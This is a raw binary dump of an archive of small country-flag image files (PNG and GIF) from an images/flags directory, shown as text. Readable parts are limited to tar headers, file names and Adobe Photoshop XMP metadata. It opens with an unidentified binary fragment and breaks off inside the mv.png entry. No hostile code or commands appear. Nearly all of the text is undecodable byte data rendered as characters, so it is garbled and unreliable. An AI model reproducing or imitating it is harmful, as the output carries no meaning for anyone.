�<�0|�wm�O��x:�$�����!�,�!E���10$	Dp�L��D�68PD$&\�aF
�"#q,@�	
6~44p�DT$�$=@�3�Ã.t~�g�����Q!����`��APpl�Ѩ�d�l�	���Ƀ���CuR`k���C��QE�{�m{bI�0X�����M���� b�Ƅr(�1�L��,(��'�
D`$D@;images/flags/bh.png000060400000000711152434416630010207 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<[IDATx�b����n�/*���_���1  ��xyy!*�����5ü��_�f���?��������@6���i@�@����._a�5��w�~��ѿ�_������@�	�tu�761��CT���Ā#�f�b�����/_f���=�x����@�@Lp'������KK��B���b��1Μf���X�o�à60��@L@'��#�&�����j`pm1@A����S�{{�?{�P
!�5���@1�z�JPP�$��Ç�����?~���+�T����=��M�WYɀ���w�Tm���IEND�B`�images/flags/lt.gif000060400000000106152434416630010214 0ustar00GIF89a����f3!�,�������ڋ�����H��);images/flags/vu.png000060400000001134152434416630010250 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�L��	@��5��k
�C�$�^�u��"�����b2�4�b����җ�'wXV�u��?��������?��0����ϟ�0�˦M���p���o�F2Mn���o�?A* ������/ �QV�@15�����K7��.c���߿�JA�~��_P=@
�!��8��w�,Z�'��!��?������_~���H����20HÏ;V�.M�s��?~�o��7���I����c���/+��u��o�?��2������ׯ�@;~��
$ $�PT�r�@�4�;����_&:@�1�������߿����D����'��C���c��@��'}������?���I�������0��2|a �-�?A�r���I�����
d$P�����=�/�/�bad`0�'��`�$��h)PĀ���Lr0$�Q�OJ�QIEND�B`�images/flags/us.gif000060400000000142152434416630010224 0ustar00GIF89a�����f33�ff�!�,'���6%��1�"B$6��f�RGVh,�l-γ����	;images/flags/am.png000060400000000761152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b����������ׯ�0�����?�1�@��1��Q���W�)'���v�eý��L�02�O���W�001���$���T�~��j����oF	�?�t�� &�B5�&�a2~�:	 �XD�f5�1y��ۿ���*��_�2H���W�7�l�������W���A�ou�M��p~8<�Ý
q�9��^��?(���T���_�����?��o��?�/�?��[�Ŝ���H@9�j��p=��������X���'����20�00�#�F�
F���������?�>0��^�o�~1����0�1 �?�Hq��ͦ�W�IEND�B`�images/flags/vn.png000060400000000732152434416630010244 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<lIDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տ�H������_�������/�8��,��b��E5P��������
��7P@�1#P5��?�.�������������'"4M ������������/�R
Df��{���	�$��@��	䤿�~;�ͯ��@
@��ï��~�T��Iv�o�� W�M�$�w��/���o��@C�00H38Ȁ�T����3�:��9~�����P��@ 
L��0HJ�����Qd$ȗ���@������+jD�c0RZ�2IEND�B`�images/flags/bs.png000060400000001016152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�f��b`cc����c����6��0���	 ��R���18:���������������������MǎȰ�w�ܽ�7$䯨�� =��1����~��D@m���x��?�3wn��+��@5@���
f��1~3����c@�4�����x1�F���z`�!�J�����{��ˏ���~����_P�@ma��~ �
 ~�����'5䷬����"���7P@�l���ׯ?<��A��M���l*��{����@����緘�Y�__�"(d`�P����_�?�E�c��[N^��7/?���B�78~�b�A�w�_/��AZz������>A���~��1$�98^/x��JIEND�B`�images/flags/lo.gif000060400000002025152434416630010211 0ustar00GIF89a��������������T`�����AS��9a���b��IH8`�\f��>e�X�۱��La�ٴ\��?;X��:`�Vx���PMZ|�U~�f��*]�\~֢8dq��)�jg�IG�LJ�ro�db�t�^�gd���i��8e���v�ޟ4`AR���-)�s��\Y�Y{��ٴ]������۷Wz�;g���u|��p��Ee�w���v��<f�?c������7g�FW����@Q�g��_mºg�̆�g��al��XT�Z����t��6i�oz�WU�Ih�it����]h��Fr�Or����*%3\�\h�Aj͓5w�̬Un^i��nkk�|�˛8h�:7�=l����?`s��Iu�TQ�m�|��b_T}�%�k��-_����x��'Y�:K��V|�/\���a��;7���:i�M\�2d�^[�+'�t(��Pwfs���LH�Y����MI�\��1-_g�Ik�Uf��j��x�{��40��w�gu����li�;l�FB����@p���B>s����QM�Uw�]�|�4\�83d��
��_[�!�,��	������hlz���0�A��/S���#LK�X1�d9E�C0 �����S�{\1s(
$r�THp'UE`��(�ǥY~m��g�.U=���q��I� r�
s̔��b�!J@��<Y�FԢJ�"�I�(�N0z�	�%cu�
�eՙ7�8�a�L2<�2$�K$Pll��c$EI6�0��-n��P��+T<8����b|墵k��4P`�@@;images/flags/kg.png000060400000000776152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�Ȁ�`$2���p)� �0أ�����ꊐ�{3��#
�p�z�U}���ߓ� �@�7�_F�����]��������(�$+� �X����G�f��������ߌ��~.�����`
@T@L @΀�Τ�Q�������Ũ�Y�H�/�%@
��ߟ�����(��?�/~�}���20'��od������/�����b���˯O~BU-:�� ��~��bï_�f��d�����������`�]��P1@�5@<uկ�~1���ן���}�������N �
%%A���1�@�7#��ِ0���$�b|��03v!��f����T��g_TIEND�B`�images/flags/bt.png000060400000001167152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<	IDATx�4ɱ	 ��(�����P�<A-Lw��A$�/�hXq�~���@,@�,j�@������g���M�?,���g���7�?�����v@�������_������'����_?�2�-���芛�ʲ�X�	l��j ���s>|���/�_�"��7�`��������v P����3������w��~�����޼Mj�����@����?���00�������3��ga������;7�?�o���j������������[�����}����_����ï�ܿ��j ��������w���,��ވp������Q�g�}�y����o�?���� ����4�?�滏z�>)�Le��xp����/Li����_��?����@,L<����?�V�n?���2|�����b��g`����?�0�
F�����|��?���"���CA@��!#���IEND�B`�images/flags/lk.png000060400000001163152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�DƱ
 �0%�3
R��pq�g� ҈3��O1�v������=��ڼ��������������-��������`�����g������˟��?��������?\"��b��d ������_�@K]�����7�-S�=��!(��ﯿ�_�{|���{��
�	���߿������7�_�sAn���;�7��'B��n���&(������� &����
��H�j����/.��7�r3���K��%���8�h�bZT
���/�
`
�����S���/��?W��}� �X�a��P	X��_������H?������ٕ�_���h@�؆�~���7�I��?��~><����ǟ����1���6#��bF
��\,L���2300��񑍕��ֿ�X�3�������{n���#RD�������P��e��}`��TsRS_��IEND�B`�images/flags/vi.png000060400000001150152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���#��L�)@,@q�]��ƌL�����_��������I��E���߿��}�� 1�������������Z�@������1����
Y������	��>
L��:���ei����	
s
1������8�������������0�������7	i���������oO^�j��=��mQ}����F������X���^q☙����߀� &9�7o~
��g��;-��W����2������Wfv�G�޽�����?(����۷����������k\AF�Oo�t������߷9o�OJIqܽ{ �X A�*�LKz/���̚_���޿7^A��Ԕ����B�Q
$99�5�����~�|v劐��_&&FFf� $f����hq�h�Z�
�E� ��v�&[IEND�B`�images/flags/ki.png000060400000001220152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<"IDATx�b����`�?P�L��?0q�b��1�������2�g�������_����ߟ?�����������O������?���>�	H1=������������R�@��	����P�@��o�6� ֿ���h6��$���
 Csn�'��3���9�7ؖE��H��sP<�T
���r��1�׍���EM���
w��
��x�����n�
�p`
�����x��1�{�qjD���M9����jP���{����R~����eQ[���w�nUW��O��=�>�WRSW>���_z���;_�}S#�����]�Ƞ<�ށ���Ez��{�}�ɷ��K
��”�����*s�>H[E��]@?@1g�t�5�U�9}�P�H��߿�/~�����?�~��{+����}7��	 1�wET(���5M��͵��cq,�������S_2�����GW4��
�8���IEND�B`�images/flags/bz.png000060400000001130152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�ɀ���0�
&��� ���v��E����𓝃��7n�_���y���3'㻏�2���ϟ�/���.�g�����?�?v��d~�����_�7h��T
D2�Lj�@��������oD�7u^c&Y�>�")y�X����~-b�@L@'�����習�v�����>w��G?%yt���t"�������`��e�Q|!�_��G�Ǔ?����W`�P~���_@W�i &�_������^<�����?��>dP}���O������o������H�o�g��{����P���;��^�g
�ÿ?���@,�0��_�_��a��g�r�����?W4;<{S���!@,�^1~���
�_�,��������6������=���/@?� ��H	��o_�0b@�f 0(t0���IEND�B`�images/flags/uy.png000060400000001024152434416630010251 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���#����"AL8��(�����M����X�0
,=���Ͽ���߿�~�2�����ڏ�۷o��611``�X�gN����?�8�c011]�q �X������w&�����e`�����k߀������ �An���\��@���q�0����?l����n����?����
t�����?YA��3��������
���
h�o?�^��p�?��X���_�	@,E���;0}������������|�%8Y�f� ��+Ɋ�?y���K���A����0�ϕ������"@�!���&

5��#���l}`8��7$��?��
t�?��o-Z@��>���4!,�?`�?�(���YL̓���"K{IEND�B`�images/flags/uz.gif000060400000000511152434416630010233 0ustar00GIF89a����������������p��
�� ��G���� ����!��e�Ҽ������#�����W��,��$����+������#�������������
����1�������b��l�Ռ�ݨ��������]�������V�������Z��������������9�:����1���!�,f�Ñ 2���t�9�ԧ$�i��E�z9����f!ժ�n�F�ʦ1@,�m�ǥd�8��8=���������;�����<�����9�����:�����A;images/flags/ad.png000060400000001203152434416630010177 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bL�����?��~�bZ1I��?��~E��a��@�?`d1��\O���������������o�����������04�&�@�K���M
���;�1<d��ٸ��4����+!Y�/�˿����T��������O��篿|�/l�~��ϟ������'㯟@'˟?@-������������S��{�+���}a������~��"���@L?~U]���~u���������)���?�-Y�@@
�����^�򓓣������9o�����_`8��	�4��i�V���?�K�=���k��'%����w����A�R�@,?�]���o �3�dp��)�?�������o ]��70���ӷ�����a�gc��8�Ou�_����O����<З � �20���W�~|���ۗ??1<��r`��?ChL��@�x�w�1z��IEND�B`�images/flags/ru.png000060400000000644152434416630010251 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<6IDATx�b���?���BAX�������)����̀�l���#�/��d�j�?6���� �==�gd��䌿���d����@$$�XX� �X�o�����H�7��?���_��Iyy��?�|��4D�/ �T�����H�R�H\)�
@�@,��5�|���Hӟ�����D��
e������f�E���?������ph����U��=L��0HJ倢`g1�� ��H ��W���*M
?�e�8aIEND�B`�images/flags/vg.png000060400000001166152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bܟ^��V��oŜ�8~վ����!���/�`1����:�����
������������������������1����ͻ����@����;��������������1��:b'
���!����
�����%P���������]�1��>^��!����<,,���������)!V?7���������שc+T=N�d|����ױ7��r��3�����/�*E	����?����1��������������������������ӫ����������	��,��@�߿~����?����PC���*/ۭ[���d���,@�5������u�T�ݺ͡#���ߟk�9�j�@@
@��IJrI��?@ڀ��.���X�2�����_��������ȑ��􏁁	 �)�C�n��IEND�B`�images/flags/lb.png000060400000001005152434416630010210 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�`$���cI�bJHtT���1�����_����?@��o ��d����M����3�@i��?�a�@��~ٿ�&)�%���1��H�```|��ռS�~���h�,�'�,󟑑�-�<@11011��� F���;������w����?�0���?�b����t����Jw]���_�n���Ƌ��������Țrd2���1��������:�����@��5@�1�o�����V����$�ʙ�������
 	@����r�>z
P������O`������8�~����y��O0.���( f&`����
��L�A��	eP������b�����"�e��@`SD�>|IEND�B`�images/flags/km.gif000060400000000213152434416630010203 0ustar00GIF89aD!�,������))�[[�oo�rr�}}倀�ﵵ�������8  �di�h�l��+�BGP�[,? ��:8��1G$�(�Yh(���ak���0*;images/flags/kn.png000060400000001134152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd���
�10���@�D2�0��aH��* F�V�j�j����������pp�	���o�'O�|���ߛ6m ��O�>*������������o-��!쿧W��k]��������\�b:h2P���@���~��5�w��_F����<>��f�ԙ�g �������r����0�߳[~_�t¯/{�2���^������@����ѿ�f`������>��-�� ����_�?�fP��b�h)�?1B���wܶe��׿~��-!�kZ�o�c��O���ׯ��3��
�@,L!
�Y���r���/�;��Vqp���������P�@�5@��u`8����K@�m|�Z�Z�K��� u ����ӿ@?#g�'����7���߬G~3�
4�l00���+��d_}�<GA�A@�S- \0~IEND�B`�images/flags/fo.png000060400000000732152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<lIDATx�b���3�ʽ��^U���b��������������/�yYR $����B���g��b6D���?�>x��l���h@��U���������V
1�
�v�������������Fu����������������������&�hc�'��J�����H�o����`�S���(@��3_�{��ϯ� �E��/	2��l�$�r��2@��#���q�k�~�����$L=}/G �X �
��_������@ 
� �af�!#+�4��P=���Kx,��>��`�Ȱ��M����C� �x0_�i�{IEND�B`�images/flags/iq.png000060400000001003152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f�����9�� x[ ֠j�68%��dT�6d�`8���$�v����"e�1��������������������������������Ӟ�������$�]�v�p���Ob\�bB'^gabfg��󥷗�|����H������O�_YIZ-�e�13���A�O(e$����p�P�:���10��
d�
�mw�Z��{D�s�@���h�7�Z1(��e�@,/^<v�ؽ{�~��/0�0@$����o��TTT�� ���FIJJ������!��/� �4?�a$4�IEND�B`�images/flags/mc.png000060400000000574152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,`����J̓(��
��7P@�1#P5Pş?��$����++��������p1��!$��Կ�����BBB���q&&��ׯ˿� |��q�,P1@�4@85��?j\0222� *@ 
/^����b�
b0� ��P
 ��_{���IEND�B`�images/flags/pm.png000060400000001261152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<CIDATx�bTMf8#����?�K�^ol``������0�����  1��Pm�f{�5>w+G�!:;!EE���@���	B?>�~��I$&/���1����������������WG���������������������������Ƿ��^��������d�����ꬨЛ���o$E_h*��� 1�����sl�!��^P����.'�����.TL�AR���K@���߿��c���￟n��߾c�{�������������?��_�N1����������0'�/$�	�:�����*�E9̎�r�1��	������n�P�x������������=��N�΃1��������������7�������������
����3qrɰJ�	����x�]�r��?������'3�����c ��30|G��tw����D�?�6p�s�c��RIEND�B`�images/flags/gn.png000060400000000740152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<rIDATx�b�π���5�����|c�.c`�F@ �X@���@��@%\�3��02�af����;&�ϟ������MS7X��O�2��D���f`����o�����~��T-�#� �X�f����
Q��?`
@Ư_���D@
�t7#P��?���a��n6DÿH��4�I@f#i��$��!����@`'��i��%�6��� ��N���U�~����?�=�����P@�40������Qdm@
�`���/�@ 
L��0HJ���00�fd�
����L�����
�@
���+8���*�?1h4ѳo��8I313g�!=�IEND�B`�images/flags/jo.png000060400000000731152434416630010230 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<kIDATx�b��@ �o��w20\�����L@��߿a$�شi@�5�0��z�t�߿�����7P�o8��@d���H����u��W�o�	���FFƇ�?�������������/Z�� ��@QQ���������?~i��Ǣ����;���&�?x����Y����J��$��9	d�=߿?����j��`'P�?@=�UO�`��w��-+����_�����?�Ͽ��JG[�H�{�?k�%�)�J�����@�����`@����￿�����<��A����Ab��1��I���[�5Ay�IEND�B`�images/flags/nz.png000060400000001177152434416630010254 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b<\ظ�H��K��Wؘ��_J���rP\�����0�����X1�-k��]���������������C
��������1����*�������=����1���M	�$������1��
0�$)#$��0/��������������]�����]#߲����Z�A�ES�ߏ_���p2,~-�@��[O�'@
1�(��	�������������M	�*�����
����#�ػ�e�]�|f�?|'���7����_~������~�����f�V�9	 �����Ư��@��������@���I���s(���?��bj�����_I�"��_`��g��E�_�<��� ���XR�(
�	x�N ��0��f��fr�߿��#C0������_��@'q��:����IEND�B`�images/flags/gi.png000060400000000717152434416630010223 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<aIDATx�b|��=���B"3��ϟ?@ �X�@�m`��8�<x@L0E0������_{��/�l��	@L�f���ٿ���ׯ�����	�
@WD+T��/?�^>��߿��	MP1@A5@�s-�����k�޲U�D(;	 ���U��И�����ݯ_�jZ�31!ԃm �3 �00p��3�Z��?N�v�_vv�S �T@�?EY��;��x��	D߿����s�ͬ��x������(���/����i�����Lׯ2�����o�?������*��-�@S~�T���=Z@�_�^AB@��
���?Xj0��R�+7��IEND�B`�images/flags/sw.gif000060400000002365152434416630010237 0ustar00GIF89a��3����ff��33��3�3��fff3�̙�����f�f̙�f�̙��f�f��̙��3�ff��f3�̙̙��f����f���̙f�����f!�XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:84F10169187A11E2A043EBCA0B012B82" xmpMM:DocumentID="xmp.did:84F1016A187A11E2A043EBCA0B012B82"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84F10167187A11E2A043EBCA0B012B82" stRef:documentID="xmp.did:84F10168187A11E2A043EBCA0B012B82"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�������������������������������������������������������������������������������������������������������������������������������~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#"! 

	!�,V�"�di��-ò�O,;٥\�#�D�����
�d��L�$@�.=N�J5x��gX�|��tZ#P�݂��Qr�%ł�!-|�!;images/flags/wf.png000060400000001052152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`���������A����0@��UWہ���+/���9���_������������/��c�&�i����=��7��ʏ����	T���?�1����!+T@ 
��1@������_2~�f��Q���������� �UtHĒ��011����|m흲�w�v�HN�)*�4�� �X.:��0{:��?�������׿�~��tt���I����<���@,��������߿�6�d}���%�{z$RS_,X�m`�v@�1�ſ@a$!�߿��7���KJ]]���n�����H�?�CU�5]��ɓ��@�?���eQQ* �_ ��IJ����0���Yd��A?�q)�7������cp00�A=q�tݯIEND�B`�images/flags/st.png000060400000001110152434416630010236 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���:����c`�#��/��@,V�>U�z00�������Ͽ?�������L�����u�7���s>-�����T�_0��ׯ��~��-�#��@,@�p}���wҵ��~��r������� ���of��[E�	�`�+8���y��w�>�_|쿙�:��1���w�/~�_�l��d��~���������k���+W�^��.��hɯ_�~�E��� �@���B\��A��~�fg���rLT�oN�_!���: �X����¿�������O�"F����?�y���W`��?��0�y� �@����[����0���
t!�:e���z��
��?�=%����$�?�����#��_�/ĸ��!����8"!E�/�h�D?@�^mI�9џ\IEND�B`�images/flags/md.png000060400000001066152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�����re`a`�����?.yA��HJP���_H���f����?�o���f��*_���������9����?��׿���D��<f`��e�����}�����������/�b�4�������z�WA�ۯ��<����������?@W�]��3����<��Sp�/�}��f���׿_�������/�À~ ����T�H���y��j��4�$����(�d��@�0���Dk�CU�T��@@
 ��?���j��+"���������/P(����� �@6��������]T���~�g����0P����d@�4�I���^�R�D��~3���Gfv6��`��A	�@�+�1Eo����pL��!WPCp�dUY�J�IEND�B`�images/flags/tv.png000060400000001030152434416630010242 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�d@���C`��X����T�[R��ÿ����2���
b�����o%KA9��s?�����x%@1����B���FF�O�>D����'^~���Ͽ@��Ȁ�_��6N]�*�0�-@1�\�B�u|��t�������/	R
�3�N�7��І�/l?�Zd!������=��2�����HO��B�S�~���,������p�I��?�@�t�����܎��)'ȱ�t+@1�������ןߗ�V����/�������Q�����t�[� �������	����,0�޾}@����i����o0���_�[N뗂��gw�^��߿�����u �ݑ"�~��2E'�sր#�?,5&�SP�ɽIEND�B`�images/flags/cu.png000060400000001063152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���긜�����7��0�������H0�D����E��������������?��? �ϟ��������"�s��g��OϞ�%%���a`���?��`����Ǐ�t���9��<}�ׯ���
a�	L222�11�G��vf3�߳g���c��v�0����r��%�9�n �
,����̿��N�d��̧]_����������_@
����b`�@ 
v�`�����?��˫��*Z��T���c	�b|�����������&�	��
00������;�ϟ�pe�����h��H`��ËJ�~� ����E�z��g�M���
a���߿������?þ�9�x���Tt&4R����S0�L��`�	 ��S�vepIEND�B`�images/flags/sy.gif000060400000004065152434416630010240 0ustar00GIF89a����������������������댁���o��������������������Tb���������su�j��������䩀����������zk�nz�wy�xn��������������������݌����������ϸ��������~��������s�gc��������v�������������أ�ɴ���pg��������������������$���������������HOѠ��mm���ע��������������������ğ���������nYs�������������������o����H4�����������������������sl����g|�\^����������<F�������������������������Č��vu㫿老���٬��hj�qg_�����������������Ԝ]�������OT��x�������ބ���ɗ���S`�������DP������YZ�CA������������������������������o��UU������������Ц���޳����-<m���!�XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:06D0EB8B03D811E1A518C1A5DDC2FB4C" xmpMM:DocumentID="xmp.did:06D0EB8C03D811E1A518C1A5DDC2FB4C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:06D0EB8903D811E1A518C1A5DDC2FB4C" stRef:documentID="xmp.did:06D0EB8A03D811E1A518C1A5DDC2FB4C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�������������������������������������������������������������������������������������������������������������������������������~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#"! 

	!�,�����@	4 H9��#~�f�T*-g~P"d��V>�`yҀ��9� �@2&FT2��@S\��W�4}�T��5�t�*Т/0L&���ƒ���C��
D�"$K�R$���kH<\�؃)Ȩn���׍`�����Ab��Er4-Z�,�>�6%��#�eYf��S�X3�rriŤ��|9�i٪ʊ�c�ՀZw(]�1P&"��C�;�(�d%�;images/flags/gd.gif000060400000001650152434416630010174 0ustar00GIF89a�3f���++3+f+�+�+�UU3UfU�U�U���3�f��������3�f��������3�fՙ�����3�f������3333f3�3�3�3+3+33+f3+�3+�3+�3U3U33Uf3U�3U�3U�3�3�33�f3��3��3��3�3�33�f3��3��3��3�3�33�f3ՙ3��3�3�3�33�f3��3��3��ff3fff�f�f�f+f+3f+ff+�f+�f+�fUfU3fUffU�fU�fU�f�f�3f�ff��f��f��f�f�3f�ff��f��f��f�f�3f�ffՙf��f�f�f�3f�ff��f��f����3�f���̙��+�+3�+f�+��+̙+��U�U3�Uf�U��U̙U�����3��f�����̙������3��f�����̙������3��f�ՙ��̙�����3��f�����̙����3�f�������+�+3�+f�+��+��+��U�U3�Uf�U��U��U�̀̀3̀f̀�̀�̀�̪̪3̪f̪�̪�̪�����3��f�ՙ�������3�f��������3�f������+�+3�+f�+��+�+��U�U3�Uf�U��U�U�����3��f������������3��f������������3��f�ՙ��������3��f��������!��,���[f�D�L`C�p T�h� ���&0����1�2�,\
���<�I`��r�2�'N4$�}�>,�p��}���	���EQB���§���1rjć�">(8�ә����3 ;images/flags/sz.png000060400000001203152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx��	 �(>lк,�~$ˡdö��M���C_�,ίj��	 �,�2<TA�3�����������4�?������&�/:@,����X'��������D@�?�~��d��@[�8�]Y�1��g�Ey�������������������Ҕ�����������	h����:q	9po�����k��p�k*�ԫGI�.�{�ׯ߿`` &���yH~m�������(���ג��
{�q�f��T�i���@������_̂.�έX���߿?~�`aa���yr��ْ�붱�xU�>�0@��O���O�߿w����oֿ��]y����3��-�����f��N6�����������o`@����+������_�����mu�/����0�E3(.��'�1�b	 �����P F��o>��D$����?�����<PK�T��`$�aN�::yIEND�B`�images/flags/mm.png000060400000000743152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<uIDATx�bd`8���~10�c``a`������(���VQ\�MW��Ǐ�|������o�?���0����ϟ�0�˦M���ʤ��.+������g����{ u�~����ee�6`Yn�a��G��%jH�$H�@g���O����j`������~3|��w�ڏ�31��V5�h:@������;��~�ӧ?��e����o�
�m ����K�~������L�����n6�`'��o�}�,��$��0����dpE��5�e����i`���ARl�_�? ��`# $��A@��5"��.\
3�V[�YIEND�B`�images/flags/tr.gif000060400000000441152434416630010224 0ustar00GIF89a��U^�#/�7B����2=�7B�AJ����^f�����NW�?I�FP�4?���������AL����%0�/;�������fn�2<�ls�:D�BL�v}�ow�rz����!�,>��pH,�H�E4�$����<K�̦HrH�#�AzHb�2AbHQ�*
�*E$|��GA;images/flags/mn.gif000060400000000276152434416630010217 0ustar00GIF89a����T��&�S��r��d���m��v�+��D��f�O��`G���!�,; &�Wi�hj����Z����2
��Ze��r�A�9�h�d�d�
��:����/2�
�B;images/flags/cr.png000060400000000735152434416630010230 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<oIDATx�bd�oe����1�����$�F�?�Ĺ
 A���>��*��W�m1z��;d��*�,�!��{�@�?��gf+`X3
��?|�@,�1����?�Ŀ��`�/�:l����k�J��A @؀��_��!(���h�\��HD
  ��ӽ��dުO�=�t/P�F��4\�������L@��)��@@J�*~#�
%��� �XD�[9��}�q(��s7��엿L||2�'�?Y��Ar���J�Pz�-@120�΋:
h�0�=�����d���@q����eԐ�Ext¹���$@��y���IEND�B`�images/flags/tj.png000060400000000760152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�����gC��V������"�����������`�����M��l�_O�����(��H�_@Ư��~�l��@����WNNN�����$�i`������	f�����������S�b�{��?���,������f����&�G�� ���AT��̲y��.@�����g�b���{�������Ǐ<<<�!����{ 
�Ҍ�p㙘��߿@,p��F�R���H��� �T�j������������_�$H�ן������"�r��"@�0�`����$��o�(P�*������/ ��/��b`g`�g``g մ8���eIEND�B`�images/flags/ci.png000060400000000705152434416630010214 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<WIDATx�b�?����c����S�G  Կ�'āR��� �X�00�V������??� ����������{ӱM�������_������ۿ�����,�,�*�b���T�����o4�@���/��%�~]@,@�12�e���?�����P
���i �W�f��K@���?�4�~1��k�I�t���`�a�t̟���@ 
� ��@���U���"`�˿L@Mܒ =���������8��^���~1��R��@q�	D������}PL3�c�� ��v�C���IEND�B`�images/flags/id.png000060400000000656152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<@IDATx�b�/����/�����������P_;P����������_ ���ߟ������� ���7�q{�"�ba`��9H�_�4������ տ����,%
� �X�2����V�T��7���Ͽ߿@�_ �?@9�b9��׿_>���jP����~�����P����@��r�����`r������2��?@�����?0�!n����{�b���###H=>�Y�/�	��R4m�hD�d@@.H� �@~�����h0�bv�B��IEND�B`�images/flags/de.png000060400000001041152434416630010203 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��qf�����?f�_�������p�b���{qq9������/������~�^�n5@�011U�8y	$�?A~���N@��"� ��,X��_�@:~�"���?~�����@��Ne@b��@�ь�7�h4�LVg�2-��K�
,�
z�#������2�����ׯP
`�@�;D?H%@�1��?���?���ڀ���T
���/@���b`P������������P�I�����@҄��a�b����_��A�*�$��B�$��b`.�a������?��FL�A��������@���@@����� �X~�e�3o�?�6f���A1������?`@03��b�21��������@�wt���_XIEND�B`�images/flags/mv.png000060400000001036152434416630010241 0ustar00�PNG


